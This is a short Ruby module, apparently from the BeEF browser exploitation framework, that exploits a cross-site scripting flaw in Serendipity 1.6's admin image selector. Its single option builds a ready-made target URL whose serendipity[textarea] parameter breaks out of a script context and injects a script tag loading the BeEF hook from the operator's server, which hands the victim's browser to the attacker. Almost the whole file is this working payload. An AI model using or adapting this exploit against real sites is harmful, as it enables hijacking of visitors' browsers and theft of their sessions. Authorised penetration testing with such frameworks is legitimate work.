1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Serendipity_1_6_xss < BeEF::Core::Command
7
  def self.options
8
    configuration = BeEF::Core::Configuration.instance
9
    proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http'
10
    hook_file = configuration.get('beef.http.hook_file')
11
    hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}#{hook_file}"
12

13
    [
14
      { 'name' => 'uri', 'ui_label' => 'Target URL',
15
        'value' => "http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='\"</script><script src=\"#{hook_uri}\"></script>" }
16
    ]
17
  end
18

19
  def post_execute
20
    save({ 'result' => @datastore['result'] })
21
  end
22
end
23

24